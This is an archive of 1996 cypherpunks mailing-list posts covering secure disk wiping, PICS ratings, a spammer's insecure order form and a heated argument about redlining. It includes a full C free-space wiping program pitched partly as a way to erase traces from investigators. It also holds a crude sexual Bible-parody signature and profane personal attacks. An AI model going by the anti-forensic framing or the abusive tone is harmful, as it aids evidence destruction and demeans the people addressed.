>> What freely available tools are there for securely
>> erasing a disk under DOS and Windows?
>> 
>> Ideally I'd like a tool for each, but pointers
>> to either are much appreciated.
>> 
>> Thanks,
>> 
>	Though, technically, no disk can be securely erased, my program,

Sure it can. Ten overwrites will rendered remnant data obscure. So says the 
electron microscope waving data recovery experts anyway.

> Very Good Privacy, can securely delete files after they have been encrypted.

Thought you said "no disk...". So how does VGP do it?

--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending me mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Mon, 9 Dec 1996 17:09:26 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: Secure Erase for PCs?
Message-ID: <199612100112.UAA28661@mercury.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


> I know this has been discussed multiple times, but
> archive searching has turned up nothing.
> 
> What freely available tools are there for securely
> erasing a disk under DOS and Windows?
> 
> Ideally I'd like a tool for each, but pointers
> to either are much appreciated.
> 
> Thanks,
> 
	Though, technically, no disk can be securely erased, my program, Very Good
Privacy, can securely delete files after they have been encrypted. I don't
know if this is what you're looking for, but if it is, check out the VGP
home page at: http://www.geocities.com/SiliconValley/Pines/2690





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Mon, 9 Dec 1996 17:59:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612100145.AA00126@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM blathered:

>More fan mail from John Gilmore and his friends:

...

Kook, must you post all the private mail you dislike to the list, while at the same time whining and bitching about the crypto-relevance of anyone and everyone else. Many folks you critique do post off topic shit from time to time, but nowhere near the percentage (much less the volume) that you do. I can't killfile your ass from this machine, but I've decided to provide a cypherpunks public service to those who can. It will be low-volume. I am going to anonymously repost everything you post that is actually crypto-relevant. It will be REALLY low volume. Now, quit posting shit about "Timmy" anonymously, with your stupid ascii drawings, and start taking your medications so you'll behave nice at the get together, where I'll see you and try not to vomit.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ArkanoiD <ark@paranoid.convey.ru>
Date: Mon, 9 Dec 1996 09:52:41 -0800 (PST)
To: attila@primenet.com
Subject: Re: The Science Generations
In-Reply-To: <199612080338.UAA24072@infowest.com>
Message-ID: <199612091750.UAA25235@paranoid.convey.ru>
MIME-Version: 1.0
Content-Type: text/plain


nuqneH,

> 
>         I still have the Gigi, the special color monitor, and the
>     source code tape from U of Toronto via DEC --compiled it on V6
>     UNIX if I remember, then Berkeley 3.9  for the 11/44 I had just
>     acquired which was obsoleted by a pair of Vaxen in about a year.
> 
Oh really? I thought BSD 2.x was the last for pdp-11. Can i get a copy of 3.9
from you?

>     800/1600 is still racked with a minivax with Ultrix V7. anyone
>     still wish to play with that old dinosaur?
> 
Great thing!


-- 
                                       _     _  _  _  _      _  _
   {::} {::} {::}  CU in Hell          _| o |_ | | _|| |   / _||_|   |_ |_ |_
   (##) (##) (##)        /Arkan#iD    |_  o  _||_| _||_| /   _|  | o |_||_||_|
   [||] [||] [||]            Do i believe in Bible? Hell,man,i've seen one!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 9 Dec 1996 19:29:29 -0800 (PST)
To: foodie@netcom.com (Bryna Bank/Jamie Lawrence)
Subject: Re: Secure Erase for PCs?
In-Reply-To: <199612100131.RAA19898@netcom.netcom.com>
Message-ID: <199612100325.VAA07661@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Bryna Bank/Jamie Lawrence wrote:
> 
> > 	Though, technically, no disk can be securely erased, my program, Very Good
> > Privacy, can securely delete files after they have been encrypted. I don't
> > know if this is what you're looking for, but if it is, check out the VGP
> > home page at: http://www.geocities.com/SiliconValley/Pines/2690
> > 
> >
> Ideally, I'm looking for a free space wiper, along the lines
> of what Burn 2.4 on the Mac can do.
>  
> As in, create a file the size of available free space, and then
> write garbage repeatedly to that file.
> 
> I've found "Real Deal", a TSR that intercepts the DEL command,
> but that's a poor substitute, at least for my needs.

I am attaching a program that does it for Unix.


/******************************************************* wipedisk.c */
/* U  N  I  X    w  i  p  e  d  i  s  k       p  r  o  g  r  a  m  .*/
/********************************************************************/

/*
 *    Copyright(C) 1995, Igor Chudov, ichudov@algebra.com.
 *
 *    This program is free software; you can redistribute it and/or modify
 *    it under the terms of the GNU General Public License as published by
 *    the Free Software Foundation; either version 2 of the License , or
 *    (at your option) any later version.
 *
 *    This program is distributed in the hope that it will be useful,
 *    but WITHOUT ANY WARRANTY; without even the implied warranty of
 *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *    GNU General Public License for more details.
 *
 *    You should have received a copy of the GNU General Public License
 *    along with this program. If not, write to the Free Software
 *    Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
 */

/*
 * Syntax: wipedisk /my/directory/filename
 */

/* 
 *   This program creates a file with a specified name (which you must 
 *   supply) and simply writes pseudo-random data into this file. It 
 *   deletes this file after it filled the whole disk with this file.
 *   Actually it unlinks the file _right after_ that file was created
 *   to avoid shitting all over the place with dummy files left in case
 *   it was killed.
 *
 *   Therefore, this program may be used to securely wipe (delete) all
 *   data that does not belong to legitimate files. Pretty neat thing to
 *   use with PGP. Note that I am not an expert in secure erasure of data:
 *   if you use this program to delete criminal traces and FBI is going
 *   after you, talk to an expert first :-)
 *
 *   It wipes disk only once; call it several times for more secure
 *   erasure. If you run it more than six times at once, consult with your
 *   psychiatrist.
 *
 *   Note that user filesystem quotas may conflict with wiping the whole
 *   disk. Also, there may be some percentage of every filesystem (usually
 *   5%) that can only be used by root. It is best if this program is run
 *   by root. Note that for a short period of time this program can make
 *   all disk space used and not available for users. Please notify your
 *   root if you plan to run this program, because running it can create
 *   hardships for other users of your Unix system.
 *
 *   It is best run from root's crontab in the middle of the night, 
 *   when everyone should be sleeping and not hacking.
 *
 *   The file named in the argument 1 must NOT exist before program is
 *   called.
 */

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

#define KILOBYTE    1024
#define PAGE_SIZE   (1024 * KILOBYTE) 
        /* This is a standard page size on my system. */
        /* should be proportional to 1024             */
#define KB_PER_PAGE (PAGE_SIZE / KILOBYTE)    

/*********************************************************** randomize */
/* fills buffer with random data                                       */
char * randomize( buf )
  char * buf;
{
  int i;
  int * ibuf = (int *)buf; 
  int int_PAGE_SIZE = PAGE_SIZE / sizeof( int );

  for( i=0; i < int_PAGE_SIZE; i++ ) 
     ibuf[i] = rand(); /* So we set 4 bytes at a time, not 1 byte at a time */

  return( buf );
}

/************************************************************** main() */
int main( argc, argv )
  int argc;
  char *argv[];
{
  int fd, i;

  char * buf;

  if( argc != 2 || !strcmp( argv[1], "--help" ) )  {
    fprintf( stderr, 
             "usage: %s file-name-to-use-for-wiping\n"
             "This utility fills free space on disk with random garbage.\n"
             "There is NO WARRANTY!!! Covered by GNU Public License.\n", 
             argv[0] );
    exit( 1 );
  }

  fd = open( argv[1], O_WRONLY | O_CREAT | O_EXCL );

  if( fd < 0 ) {
    fprintf( stderr, "Can't open file %s for EXCLUSIVE writing\n",
             argv[1] );
    exit( 1 );
  }  

  unlink( argv[1] ); /* let's unlink it now so that if someone kills
                        me, the file with bullshit will be gone */

  if( (buf = (char *)malloc( PAGE_SIZE )) == 0 ) {
    fprintf( stderr, 
             "Wow, malloc failed. Your system must be royally hosed.\n" );
    exit( 1 );
  }

  srand( time( 0 ) );

  for( i=0; write( fd, randomize( buf ), PAGE_SIZE ) == PAGE_SIZE; i++ ) {
    /* every time we write a newly randomized buffer and stop
     * writing when we cannot write any more 
     */

    if( (i % 1) == 0 ) {
      /* Just to say I am not dead */
      printf( "%d Kbytes of pseudo-random data (rand()) written\r", 
              i * KB_PER_PAGE );
      fflush( stdout );
    }
  }

  printf( "\nSyncing disk (wait 30 sec)...\n" ); /* Ughh... */

  sync();

  sleep( 30 );

  printf( "Done.\n" );

  free( buf ); /* I am a good guy */

  close( fd );
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Lawrence <foodie@netcom.com>
Date: Mon, 9 Dec 1996 21:40:11 -0800 (PST)
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Secure Erase for PCs?
In-Reply-To: <199612100131.RAA19898@netcom.netcom.com>
Message-ID: <v03007800aed2a5ca430e@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Igor -

Thanks for sending this. If I end up porting it, I'll send
you a copy. I just wanted to wipe a client's disk. I'm a
little surprised that there doesn't seem to be any tools for
this on the PC. Another area where Mac's seem to be innovative...

-j

At 9:25 PM -0600 on 12/9/96, Igor Chudov @ home wrote:

> I am attaching a program that does it for Unix.

--
"I'm about to, or I am going to, die. Either expression is used."
                - Last words of Dominique Bouhours, Grammarian, 1702
____________________________________________________________________
Jamie Lawrence                                     foodie@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Dec 1996 19:08:05 -0800 (PST)
To: cyberia-l@listserv.aol.com
Subject: FIPS Meeting Material
Message-ID: <1.5.4.32.19961210030455.0066808c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


John Thomas has provided copies of printed material
handed out at the Dallas meeting on FIPS for the Federal
Key Management Infrastructure (KMI) on December 5-6.

It consists of lists of particpants, charts, diagrams and
outlines of the government's prayerful intentions for KMI 
which Mr. Thomas admirably assessed in his post earlier today.

We've digitized and put it with his post on the meeting at:

     http://jya.com/fipsmeet.htm

Thanks to Mr. Thomas and Bowles & Thomas, L.L.P.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Mon, 9 Dec 1996 22:06:36 -0800 (PST)
To: John Fricker <cypherpunks@toad.com
Subject: RE: Secure Erase for PCs?
In-Reply-To: <19961210040455486.AAA189@dev.vertexgroup.com>
Message-ID: <v03007808aed2ae981832@[206.214.106.83]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:05 PM -0800 12/9/96, John Fricker wrote:
>>	Though, technically, no disk can be securely erased, my program,
>
>Sure it can. Ten overwrites will rendered remnant data obscure. So says the
>electron microscope waving data recovery experts anyway.

You should really check out Peter Gutmann's paper in the 1996 Usenix
Security Conference Proceedings.  After reading it, I think you will come
to the conclusion that the only secure data destruction technique, against
a well-funded attacker, is destruction of the disk.  I like thermite myself.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 9 Dec 1996 19:53:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [ANNOUNCEMENT] Secure envelopes
In-Reply-To: <199612092202.OAA25870@sirius.infonex.com>
Message-ID: <199612100411.WAA00425@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


>        |\    \ \ \ \ \ \ \      __
>        |  \    \ \ \ \ \ \ \   | O~-_ 
>        |   >----|-|-|-|-|-|-|--|  __/
>        |  /    / / / / / / /   |__\
>        |/     / / / / / / /
> 

     Feessssssshhhhhh Boooooooooooooooooooonnnneee!!!


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@conch.aa.msen.com>
Date: Mon, 9 Dec 1996 19:12:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Security problems in recent list spam
Message-ID: <Pine.BSI.3.92.961209220510.8933A-100000@conch.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


I was irritated enough by a recent Commercial spam to the list,
(a message from Sue) that I researched the web pages it points us to.

I note 2 very interesting features in the order form page
(www.steppingstones.com/ordercab.htm)

This form collects various info, and returns a POST request invoking
 ACTION="/cgi-bin/mailto.exe"

It appears that these folks leave themselves open to some abuse,
from anyone creative enough to modify the form slightly!

Also, in the ObSnakeOil department, the form contains this claim:
> You are ordering via a secure server which scrambles your credit card
> information to prevent it from being intercepted.  If, however, you are
> still not comfortable sending your credit card number on line, please
> fill out the above order form without any payment information and either
> call us toll free at 1-800-585-1118 (outside the US, call (203) 730-2220)
...

Now, it appears that this form returns a non-encrypted POST request
to their server, and furthermore the action taken by the server
is to email all the data to the ultimate business recipient.
Thus the credit card info would be sent through the net TWICE as
plaintext.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 9 Dec 1996 22:14:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <3.0.32.19961208154000.006adf40@netcom14.netcom.com>
Message-ID: <v03007800aed2affe52a7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:52 PM -0800 12/8/96, Lucky Green wrote:
>At 09:15 PM 12/7/96 -0800, Thaddeus J. Beier wrote:
>>I don't think that PICS will be mandated any more than those two standards
>>are mandated, perhaps I'm naive, but I think that the social conventions
>>will work in this case.
>
>Let's put the question if something like PICS will be mandated aside for
>the moment. Do you agree that sites that deliberately mislabel their
>content, will eventually face legal action? If so, then PICS should not be
>considered truly voluntary.

Or, the version I think is simpler:

If I believe pictures of people having sex should be marked "Suitable for
all ages" (or whatever the Official PICS Status Code is) will I be
criminally or civilly in danger? If so, then PICS is a ratings system which
individuals are likely to be unable to interpret themselves.

(This takes the element of intent to deliberately defeat PICS out of the
equation, and asks if "innocent mislabeling" or "philosophical disagreement
alternate labeling" will expose the mislabeller to charges.

What I see with any such enforcement of PICS standards is yet another Full
Employment Act for Lawyers, and the Lawyer's Guild will be oh so happy to
see PICS essentially made part of the bureacratic morass:

"Due to the complexities of the PICS ratings system, and varying community
interpretations of the elements of PICS, we advise that no person post
anything to the Net with a PICS rating without seeking competent legal
advice from a PICS-licensed legal professional."

--Tim

(my "Suitable for religious students of all ages"-rated alternate sig follows.)


--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 9 Dec 1996 22:33:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <199612080515.VAA01745@hammerhead.com>
Message-ID: <v03007801aed2b3b732a1@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:15 PM -0800 12/7/96, Thaddeus J. Beier wrote:

>PICS, or something like it, is the absolutely right response to calls
>for true Internet censorship.  People agreeing to a language, a way
>of communicating, is a good thing.
>
>Did you object to HTML?  TCP/IP?  Other agreements that limited the way
>that people communicate?

These examples are essentially part of the "infrastructure." They are akin
to video tape standards (Beta vs. VHS) or t.v. formats (NTSC, PAL, SECAM).
Or to the physical and electrical standards for cable transmission.

In none of these cases is _content_ looked at. Indeed, the average user of
TCP/IP and HTML need never concern himself with such things.

PICS, on the other hand, would not be at such an "infrastructure" level, as
it would involve the human originator of a work making value judgements
about the prurient content of his work, the blasphemy quotient, perhpas,
and so forth. And, failure to make the correct value decision could
presumably expose the author/labeller to various charges (should PICS be
mandated or should the standards be implemented in civil code, etc.).

(If they are not mandated/implemented, an awful lot of folks like me are
going to deliberately label our material in various monkeywrenching and
"imp of the perverse" ways, just to watch the sparks fly.)

In any case, I don't see PICS as anything like the "infrastructure layer"
protocols of TCP/IP and HTML, just as I don't see the MPAA ratings systems
on movies as anything comparable to motion picture technical standards like
sprocket spacing, frame rates, etc.

--Tim May



--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Tue, 10 Dec 1996 00:15:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <199612100815.AAA09236@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



I seem to have upset you, Matt Miszewski, and I am sorry for that.  It
appears to me that the problem we have is that we have different ideas
about what is right and different perceptions of the nature of the
world.

It may appear that I intentionally put words in your mouth.  This is
not the case.  We have different ideas about what is obvious.  I have
made assumptions, but they seemed clear to me.  Apparently, they were
not.  We may still have a fruitful discussion.

At 4:17 PM 12/9/1996, Matthew J. Miszewski wrote:
>At 03:14 PM 12/4/96 EST, Bovine Remailer wrote:
>>At 11:26 AM 12/4/1996, Matthew J. Miszewski wrote:
>[snippo]
>>If I earned my very own money honestly and I choose to lend it only to
>>Albanians, you believe that this would be inefficient and, therefore,
>>forbidden.  
>
>Actually I didnt say anything about private lending.  But as this thread
>goes on you seem to assume much.

I am assuming that you agree that somebody who has earned their money
honestly should be able to lend it to whomever they please for
whatever reason they like.  You call this private lending.  (Please
correct me if I am wrong.)

I believe that five friends should be able to get together, pool their
resources, and lend their money to whomever they like.

I believe that ten, or a hundred, or a thousand people should be able
to pool their money and lend it to whomever they please for whatever
reason they like.

That, essentially, is what a bank is.  I do not believe the government
should dictate which people you, or your bank, are allowed to lend to.

>>In other words, you do not believe that I should be able
>>to lend money to anybody I please.  You can call it "equal access to
>>capital" or "denial of opportunity", but the clearest and simplest
>>description is that you believe I should not be able to lend my money
>>to whomever I please.  Instead of pretending otherwise, just say "I
>>believe you should not be able to lend your own money which you earned
>>honestly to anybody you please.  I believe you should be allowed only
>>to lend money in these circumstances..."
>
>I dont assume that anyone (or any corporation) has earned their money
>honestly.  Quite often that is not the case.

It does not seem reasonable to me to tell people who they may lend
money to on the grounds that some people might have obtained their
money dishonestly.  What would be reasonable would be to charge the
dishonest people with their crimes and return the property to the
rightful owners.

>I have said a few times already that I *do* believe in limited
>regulation.

However, we disagree about which regulations are just.

>And apparently you believe that ad hominem is cool.

>>Of course, non-discrimination is a vague term.  
>
>Actually it is not.  I am an employment law attroney.  I know the
>definition.  I know also what I need to do to prove it.  I also know that
>many times the definition (legal) fails to meet the reality of the
>situation.  But as I said before, we do not live in a perfect society.

I do not believe that in practice discrimination is clear at all.

If I put up a sign in my store saying "Irish need not apply", then
there is a case.  Usually, it is not so clear.

It is difficult to prove discrimination because merit is so hard to
determine.  Many factors go into a hiring decision.  In the end, it is
usually made on the gut level.  There is really no way to prove that
the decision was discriminatory.

Consider the computer industry.  For whatever reasons, right now there
are very few African-American software engineers who are amongst the
very best.  They exist, but you don't see them very often.  What this
means is that you can't look at the percentage of African-Americans
working for a software company to decide whether the company makes
discriminatory hiring decisions.

>>>I agree.  I am not arguing that we need to withdraw Title VII.
>>>Aparently you are?
>>
>>I do not know what is in Title VII.  Perhaps it would be better to
>>ask me about particular policies.
>
>It is all becoming clear to me now.  Perhaps you should understand
>what laws you are rallying against before you attempt to defeat them.
>I have no need to ask *you* about policies.  Considering you have
>recently popped up, you have not even a small collection of
>reputation built up.

We can certainly discuss policy without delving into Title VII and its
repeal.  One advantage of discussing the policy in general is that we
can make statements about entire classes of legislation, rather than
specific laws which should be added or repealed.

>>In fact, I am open to the possibility that poor people really are
>>disenfranchised.  
>
>No you are not.  You show your stripes below.

No, I told you my opinion.  So far nobody has demonstrated in a
persuasive manner how the poor are disenfranchised.  Consequently, I
believe that disenfranchisement is a small part of the explanation.

>>But, if I am to believe that I must hear an explanation that makes
>>sense to me.  If poor people are poor because absolutely nobody will
>>do business with them for completely irrational reasons, that seems
>>extremely unlikely.  Even if most rich people are able to control
>>their greed just to punish poor people of the wrong race, which is
>>already hard to believe, you actually have to claim that they are
>>all this way.
>
>Actually, I dont.  Not all rich people utilize their wealth.  Dont
>believe it?  Ask Bill Gates and the latest Slate.

It is true that not all rich people use their wealth to their own best
advantage.  I am not claiming that all rich people are greedy and
smart.  What I am claiming is that many rich people are greedy and
will certainly seize opportunities that are presented to them.

Let's say one in a thousand rich people is willing to exploit the
inefficiencies of the home mortgage market.  This represents a vast
pool of capital which we are not seeing in "redlined" areas, if what
you say is true.  When people with capital so universally avoid an
investment, my first thought is not that every last one of them is a
racist.  My first thought is that it is not a good investment.

(My next thought is "Gee, if they're wrong, I could make a lot of
money!")

>>Just like anybody else does.  You watch every penny.  You don't eat
>>meat.  When you buy food, you buy inexpensive healthy food like
>>lentils instead of expensive unhealthy food like Coca-Cola and potato
>>chips.  You do not go to McDonald's.  You walk when you can instead of
>>taking the bus or you ride a (used) bicycle.  You don't smoke
>>cigarettes.  You do not buy alcohol.  You do not buy other
>>recreational drugs.  You buy your clothing used.  You economize on
>>your living arrangements, perhaps by having a large number of
>>roomates.  (Note that this is illegal in most cities.  That is a form
>>of disenfranchisment.)  You do not make long distance calls.  If you
>>can, you share a phone with other people. etc. etc. etc.
>>
>>If you know poor people, you will know that few of them do these
>>things.
>
>My vocation is intimately involved with poor people.  I have been there
>myself.  I do not defend my beliefs on those grounds.

You asked me how poor people could save money.  I believe I have
answered the question.  I am sorry if I have pursued an irrelevant
line of inquiry.

>If I did I could easily just state the opposite.  But hey, Ill bet
>you arent racist either 'cause you have Black friends.

You have no idea of my race or my friends.  Yet, it appears that you
are making some assumptions based on a few thousand bytes of text.
Interesting.

>The poor people that I help are nothing like the media productions
>you believe in.

Actually, I believe my own experience of being poor and living with
poor people.  I am prepared to believe that my experience was unusual,
but you will have to provide some evidence, anecdotal at the very
least.

>I realized after reading this last paragraph what kind of person I am
>dealing with.

I may be the most terrible person in the world.  It is not relevant to
this discussion, is it?

>Poor people, in your eyes, remain poor because they apparently have
>no will of their own to get out.  If you *actually* understood utter
>poverty you would also understand the idiocy of the statement.

I like to think I am not an idiot.  Fortunately, you say little here
that makes me think I am.

You might find it more effective to explain in what way I am an idiot.
Remember, I and the thousands of other people who read this list may
not necessarily know what you know.  It may be that some of us only
lack a little explanation or a little helping hand to start us on the
road from idiocy.

>Many of personal friends have 'escaped from the killing fields' and
>have opened my eyes to the reality of the situation.  I will no
>longer try to open yours.  You are not interested in learning
>anything.

How will I learn if you call me an idiot instead of explaining your
other views?  That may be effective in convincing people who already
agree with you, but it is not a way to win converts.  When you mention
escaping from the killing fields, I simply have no idea what you are
talking about.  (I do not say this to be insulting.)

>>Also, you work hard to increase your earnings.  You show up at work on
>>time every time.  You develop a good work ethic.  You wear clean
>>professional clothing at work.  You treat your employer and coworkers
>>with respect.  etc. etc. etc.
>
>That's right.  I forgot.  Poor people dont come to work on time. They
>dont develop a work ethic.  They wear dirty clothes.  And they are
>disrespectful.  And when they dont do these things they are not
>passed up for promotion, never meet a glass ceiling and are never
>discriminated against.  Now I get it.  What was I thinking?

I can only tell you what I have seen.

>>Read "Your Money or Your Life" by Joe Dominguez and Vicki Robin.  It
>>outlines a workable program that all poor people - and quite a few
>>others - will be able to use to their benefit.
>
>I live in reality not theory.

If a theory does not work out in reality it is not of much use.

Next time you are in the bookstore, flip through the book.  It's not
what you think it is.  You'll like it.  Really.

>>But why isn't that good news?  If it's really market inefficiency,
>>why not exploit it?
>
>Because I personally carry to high a debt burden to qualify for the
>loan.

I outlined a plan which would not require you to put up any money of
your own.  As an attorney, you have a tremendous advantage because you
don't have to pay legal fees.

Your own debt burden doesn't matter much if the holding company
borrows the money.  You can give your investors control of the company
and just take commissions on every mortgage you create.

>I also suffer from doing something with my life that I both enjoy and
>feel makes a difference.

That's nice.  I mean that.  But, if the inefficiency you are pointing
at is as large as you say, there should be an opportunity to make many
millions of dollars.  Surely, you could do some good with all that
money.  And, imagine what effect you would have if you did make
yourself rich lending to poor people who are subjected to irrational
discrimination.  Maybe some other rich people would get the good idea.

>>But, even if it were possible to define precisely what racism is, I
>>would still believe it should be legal.  There is no accounting for
>>taste and it is wrong to dictate it to other people when they are
>>causing no harm to others.
>
>Try defining harm.  Try defining taste.  People like you have argued that
>slavery caused no harm.

Now who is making an ad hominem attack?

In this discussion I am arguing for greater human freedom and you are
not.  You have more in common with the slaver than I do, sir.

>Disallowing women to vote caused no harm.

What are you talking about?

>And of course that discrimination in the workplace causes no harm.

It causes harm if you believe people have an obligation to work with
everybody.  I don't believe this.  Let's say somebody likes only
Albanians and hates everybody else.  I would rather that person spent
his or her time with Albanians and not with me.  No harm done.  What
is more, I believe I have no moral right to demand that person spend
time with me if they don't want to do so, for whatever reason,
including discrimination.

>This just makes me glad that you are clearly in a minority, unable to
>withstand the wheels of change.

Change is not in and of itself a blessing or a curse.  Positive change
is a blessing.  Redlining laws are nothing new.  Cryptoanarchy is.

>>>Generally, people who understand the problem are without access to
>>>capital.  They would like to go there.  They cant get capital.  When
>>>they approach current interests, they wont go there.
>>
>>Maybe there's something funny about the deal.
>
>That's it.  All those lawyers involved with putting together deals
>(something they succesfully do for a living) put together a funny deal.
>That's it.  It's a conspiracy.  Be careful everyone, the poor people are
>planning something.  Run, run.

The "funny" I had in mind was that it wasn't such a good investment,
not that lawyers are universally corrupt.  The fear that potential
investors have is not that the "poor people are planning something",
but that they are not planning anything and will be unable to pay back
the money they borrow.

>>>There are a few examples of people who actually realize this as a
>>>problem/opportunity.  Oddly enough, this point reinforces mine.
>>>Redlining did exist.  Bank of America realized it and made a lot of
>>>money.  But it still exists elsewhere.  Why dont business plans
>>>around the country spring up on venture capitalists desks with an
>>>approved stamp on them?
>>
>>More to the point, why isn't Matthew J. Miszewski drooling in
>>anticipation of all the money he is going to make by recognizing this
>>glorious opportunity?  Giannini made a tremendous amount of money.
>
>Just because a market exists that is far from stating that barriers to
>entry arent enormous and that a market segment is sufficient to make
>'tremendous amounts of money'.

But the mortgage market is huge.  And, we have inner cities all over
the U.S.  If you there are large areas which are completely unserviced
by lending institutions, this is a huge opportunity.

I am prepared to hear that there are barriers to entry.  What are
they?

>This will be hard for you to understand, but apparently you have no
>interest in expanding your horizons.  

Could this be considered an ad hominem attack?

>>Hmmm?  Maybe it was lousy investment in spite of a good ROI number.
>>Nobody?  Not one person was willing to buy in?  Hardly an
>>endorsement.
>
>What are you talking about?  Good ROI, good investment.  How do you
>define 'lousy investment'?  Maybe you work for a bank?  What do you
>do?  Oh yeah, you are Red Rackham.

If you knew where Red Rackham got his name, you would find it amusing.

No, good ROI does not mean good investment.  "Past performance does
not guarantee future results."  An investor cares about future
results.  What happens to mortgages in poor areas during the next
recession?

BTW, what reasons did your prospective investors give for declining?

>>>Compare this now to people whom banks would generally consider a
>>>good risk.  College Graduates.  Generally, these folks live outside
>>>of the red line.  Good risks right?  What about those nasty student
>>>loan default rates?  The red lines dont make business sense.
>>
>>I'm hearing that cash register ringing.  Go for it!
>>
>
>Whenever a good point is made, you go to that nifty "ring, ring"
>crap.  Do you deny that the default rate on student loans is
>outrageous.  Do you deny that these people generally live out of the
>redlines?

This wouldn't surprise me much.  But, aren't student loans typically
cosigned, often by the government?  I hope the problem is obvious.

If people (e.g., banks) want to lend their money to high default rate
groups, I won't object unless it's my money.

>>That's easy.  Once a month get ten families together to go to the
>>nearest warehouse store in the suburbs and stock up on provisions.
>
>Have you carried that much home on a bus lately?  I mean, you were
>poor, no?  Or do we all forget little things like that?

Incidentally, I do see poor people taking their groceries on the bus.
Smart.

Usually, poor people know somebody with a car.  But, let's say they
don't.  There are all sorts of delivery and shipping services
available.  Taxi services, for instance, usually have a few vans
around for hauling things.  And, there are grocery delivery services.
You could probably find a store which would throw in delivery if
enough goods were moving.  Say it costs $20 (you take the bus there),
that's not much when spread over a thousand dollars of food.

>>Or, one poor family could buy a bunch of stuff every month and sell it
>>out of their house and save everybody the trip.
>
>Making the original capital in their basement of course.  How many
>microloan programs do you know of Red?

It doesn't require a microloan.  The other families could give their
friends the money and save the trip.

>>Discussions regarding "the cycle of poverty" are usually little more
>>than litanies of excuses.
>
>I keep forgetting that poor people want to remain poor.  When will I
>learn.  They use up all their energy thinking up excuses.  Oil
>Company execs never treat blacks differently.  Glass ceilings dont
>exist.  Hey if I keep saying it maybe I will learn.

I don't believe I have said anything about the management of oil
companies or glass ceilings.

The reason most people are poor is because they are not functioning
well in their environment.  I am prepared to hear otherwise, but this
has been my experience.

>>I challenge you to put your own money into this venture.  You don't
>>even have to quit your job to get into the microlending business until
>>you've built it up to the point where it can support you.
>
>This sounds like advice from someone who has never tried.  Not you, red.

